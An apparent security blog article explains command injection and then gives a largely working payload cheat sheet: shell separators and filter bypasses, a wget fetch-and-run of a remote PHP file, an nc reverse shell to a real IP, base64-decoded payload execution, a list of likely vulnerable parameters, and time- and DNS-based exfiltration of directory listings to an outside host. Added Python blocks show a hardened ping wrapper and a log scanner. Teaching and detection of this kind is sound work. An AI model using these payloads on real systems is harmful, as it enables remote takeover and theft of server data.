What is command injection?

11 March 2024 5 minutes Author: Cyber Witcher

The article is dedicated to Command Injection, a type of attack where an attacker can execute arbitrary operating system commands on the server hosting the application. This can lead to complete compromise of the application and all its data. Executing these commands typically allows an attacker to gain unauthorized access or control over the application’s environment and system.

  • Disclaimer: This material is for informational purposes only. The authors are not responsible for any possible misuse of the information. Knowledge of vulnerabilities is essential to improving software security.

What is command injection, how did it come about, and why is it dangerous?

Command Injection is one of the most common and dangerous types of attacks on web applications and servers. In this attack, an attacker has the ability to execute arbitrary operating system commands on the server, which gives them control over the application, its data, and even the entire system.

How did command injection appear?

This type of attack arose along with the development of web technologies, when developers began to integrate system commands to automate tasks on servers. Careless processing of user input often produces vulnerabilities that allow attacker-supplied commands to be executed. For example, if an application passes user input directly to the operating system shell without proper validation, an attacker can insert their own command, changing the behavior of the application.

What is dangerous about command injection?

The danger of this type of attack is as follows:

  • Gaining access to the system. An attacker can gain access to system files, databases, or confidential information.

  • Complete control over the server. If the attack is successful, the attacker can install malware, modify data, or even use the server for further attacks.

  • Reduced performance or failure. Executing resource-intensive commands can cause the system to overload or crash.

  • Financial and reputational losses. Compromise of customer data or corporate information can cause significant losses.

It is important to understand that command injection is not dependent on programming language or platform: any system that executes operating system commands is potentially vulnerable. Protection against such attacks consists of implementing secure coding principles, such as validating and sanitizing input, using parameterized queries, and minimizing privileges.
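The same "ping a host" feature written two ways, as an added example that is not part of the original article: the vulnerable version builds a shell string from the user's value, so the separators described here (;, |, &&, a %0a newline) append a second command, while the hardened version validates the value against an allow-list and passes it as a single argv element with no shell involved. The `ping -c 1` command, the function names and the hostname grammar are the example's own assumptions.

```python
import ipaddress
import re
import shlex
import subprocess

# RFC 1123 hostname grammar: dot-separated labels of 1-63 chars from [A-Za-z0-9-],
# no leading or trailing '-', 253 chars total. '.' never matches a newline, so the
# %0a-separated payload style shown in this article cannot pass.
_HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
)


def build_command_vulnerable(host: str) -> str:
    """Shell string as a vulnerable app would hand it to system()/os.system (illustration only)."""
    return f"ping -c 1 {host}"


def build_command_quoted(host: str) -> str:
    """Fallback when a shell is unavoidable: shlex.quote makes the value a single word."""
    return f"ping -c 1 {shlex.quote(host)}"


def is_safe_target(value: str) -> bool:
    """Allow-list check: a literal IPv4/IPv6 address or a well-formed hostname, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return _HOSTNAME_RE.fullmatch(value) is not None


def build_command_hardened(host: str) -> list[str]:
    """argv for subprocess.run(shell=False); anything outside the allow-list is rejected."""
    if not is_safe_target(host):
        raise ValueError("target must be a hostname or IP address")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> int:
    """Run the hardened command with a timeout; no shell is started at any point."""
    argv = build_command_hardened(host)
    return subprocess.run(argv, shell=False, timeout=10, capture_output=True, check=False).returncode
```

The decoded form of the article's `127.0.0.1 %0a id` payload becomes two shell lines in the vulnerable string, one quoted word in the quoted string, and a rejected value in the hardened path.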

Command injection is a serious threat that can have catastrophic consequences for system security. Understanding its mechanism and implementing timely protection helps to avoid risks.

What is command injection?

Command injection allows an attacker to execute arbitrary operating system commands on the server hosting the application. As a result, the application and all its data can be completely compromised. Executing these commands typically allows an attacker to gain unauthorized access or control over the application environment and host system.

Context

Depending on where your input is injected, you may need to terminate the quoted context (with " or ') before the commands.

Command injection/execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute the 2nd only if the 1st succeeds
ls&id; ls &id; ls& id; ls & id # Execute both, but only the output of the 2nd is shown
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Examples

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Parameters

Here are the top 25 parameters that may be vulnerable to code injection and similar RCE vulnerabilities (refer to ):
?cmd={payload}
?exec={payload}
?command={payload}
?execute={payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}
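A defender's counterpart to the separator list and the parameter list above, added here and not part of the original article: a small scanner that URL-decodes the query parameters in access-log lines and flags the separators, substitutions and parameter names taken from those two lists. The log lines are constructed for the example and the severity scheme is the example's own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names from the list above; a hit on one of these raises the severity.
SUSPECT_PARAMS = {"cmd", "exec", "command", "execute", "ping", "query", "jump", "code",
                  "reg", "do", "func", "arg", "option", "load", "process", "step", "read",
                  "function", "req", "feature", "exe", "module", "payload", "run", "print"}
# Shell constructs from the cheat sheet: ; | || & && newline `...` $(...) ${...} < >
SHELL_META = re.compile(r";|\|{1,2}|&{1,2}|\n|`|\$\(|\$\{[^}]*\}|[<>]")
# Combined Log Format: only the client, request target and status are needed here.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

# Constructed sample lines (not real traffic); line 3 is benign but uses a listed name.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Mar/2024:10:01:02 +0000] "GET /ping?host=192.168.1.10 HTTP/1.1" 200 512
10.0.0.7 - - [11/Mar/2024:10:01:09 +0000] "GET /ping?host=127.0.0.1%0aid HTTP/1.1" 200 611
10.0.0.9 - - [11/Mar/2024:10:02:15 +0000] "GET /search?query=shell+tutorial HTTP/1.1" 200 2048
10.0.0.9 - - [11/Mar/2024:10:02:31 +0000] "GET /api?cmd=ls%3B%20id HTTP/1.1" 500 0
"""


def classify_request(target: str) -> list[tuple[str, str]]:
    """Return (parameter, severity) for every query parameter worth a look."""
    findings = []
    # parse_qsl percent-decodes, so %0a becomes a real newline before matching.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        meta = SHELL_META.search(value) is not None
        known = name.lower() in SUSPECT_PARAMS
        if meta and known:
            findings.append((name, "high"))    # command-style name *and* a separator
        elif meta:
            findings.append((name, "medium"))  # separator in some other parameter
        elif known:
            findings.append((name, "low"))     # listed name only; review in context
    return findings


def scan_log(text: str) -> list[dict]:
    """One alert per access-log line that produced at least one finding."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, target, status = m.groups()
        findings = classify_request(target)
        if findings:
            alerts.append({"src": src, "target": target, "status": int(status), "findings": findings})
    return alerts
```

Decoding before matching is the point: a raw-string filter on `;` or `|` misses the `%0a` form entirely, while `parse_qsl` turns it into the newline the shell would see.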

Time-based data theft

Data extraction: character by character

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS-based data theft

Based on the tool from https://github.com/HoLyVieR/dnsbin, also hosted at dnsbin.zhack.ca.
1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Online tools to check for DNS-based data theft

  • dnsbin.zhack.ca

  • pingb.in

Bypass filtering

Windows:

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc